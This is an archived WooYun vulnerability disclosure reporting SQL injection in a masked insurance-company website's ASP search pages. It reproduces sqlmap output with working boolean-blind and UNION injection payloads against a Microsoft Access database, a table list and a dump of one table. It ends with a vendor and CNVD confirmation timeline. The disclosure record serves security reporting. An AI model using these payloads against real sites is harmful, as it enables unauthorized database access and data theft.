乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-16: 细节已通知厂商并且等待厂商处理中 2015-10-20: 厂商已经确认,细节仅向厂商公开 2015-10-30: 细节向核心白帽子及相关领域专家公开 2015-11-09: 细节向普通白帽子公开 2015-11-19: 细节向实习白帽子公开 2015-12-04: 细节向公众公开
如题.....
注入点http://**.**.**.**/CHN/Home/HomeList_Search.asp?SearchString=1http://**.**.**.**/CHN/Home/HomeShow.asp?ContentId=1
Parameter: SearchString (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: SearchString=1%' AND 7347=7347 AND '%'=' Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: SearchString=-4685%' UNION ALL SELECT CHR(113)&CHR(112)&CHR(113)&CHR(112)&CHR(113)&CHR(80)&CHR(86)&CHR(72)&CHR(87)&CHR(85)&CHR(115)&CHR(65)&CHR(72)&CHR(71)&CHR(117)&CHR(113)&CHR(106)&CHR(118)&CHR(122)&CHR(113),NULL,NULL FROM MSysAccessObjects%16---web server operating system: Windowsweb application technology: ASP.NET, ASPback-end DBMS: Microsoft AccessDatabase: Microsoft_Access_masterdb[7 tables]+---------+| area || branch || company || exam || job || member || news |+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: SearchString (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: SearchString=1%' AND 7347=7347 AND '%'=' Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: SearchString=-4685%' UNION ALL SELECT CHR(113)&CHR(112)&CHR(113)&CHR(112)&CHR(113)&CHR(80)&CHR(86)&CHR(72)&CHR(87)&CHR(85)&CHR(115)&CHR(65)&CHR(72)&CHR(71)&CHR(117)&CHR(113)&CHR(106)&CHR(118)&CHR(122)&CHR(113),NULL,NULL FROM MSysAccessObjects%16---web server operating system: Windowsweb application technology: ASP.NET, ASPback-end DBMS: Microsoft Accessbanner: Nonecurrent user: Nonecurrent database: Nonehostname: Nonecurrent user is DBA: NoneDatabase: Microsoft_Access_masterdbTable: branch[8 entries]+----+--------+-----+------+-------+---------+-----------------------------------------------------------------------+----------+| id | areaid | url | data | email | manager | address | priority |+----+--------+-----+------+-------+---------+-----------------------------------------------------------------------+----------+| <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | S\x17N\\?ac^\x02?W\\?ceS:?b\x10?Y\x16Y'?u29S\\?f7V\\?fd[\\?beQ\\?99[W | <blank> || <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | S\x17N\\?ac^\x02?W\\?ceS:?b\x10?Y\x16Y'?u29S\\?f7V\\?fd[\\?beQ\\?99[W | <blank> || <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | S\x17N\\?ac^\x02?W\\?ceS:?b\x10?Y\x16Y'?u29S\\?f7V\\?fd[\\?beQ\\?99[W | <blank> || <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | SN\?ac^?W\?ceS:?b?YY'?u29S\?f7V\?fd[\?beQ\?99[W | <blank> || <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | SN\?ac^?W\?ceS:?b?YY'?u29S\?f7V\?fd[\?beQ\?99[W | <blank> || <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | SN\?ac^?W\?ceS:?b?YY'?u29S\?f7V\?fd[\?beQ\?99[W | <blank> || <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | SN\?ac^?W\?ceS:?b?YY'?u29S\?f7V\?fd[\?beQ\?99[W | <blank> || <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | SN\?ac^?W\?ceS:?b?YY'?u29S\?f7V\?fd[\?beQ\?99[W |+----+--------+-----+------+-------+---------+-----------------------------------------------------------------------+----------+
过滤关键字......
危害等级:高
漏洞Rank:10
确认时间:2015-10-20 16:34
CNVD确认并复现所述情况,已经转由CNCERT向保险行业信息化主管部门通报,由其后续协调网站管理单位处置.
暂无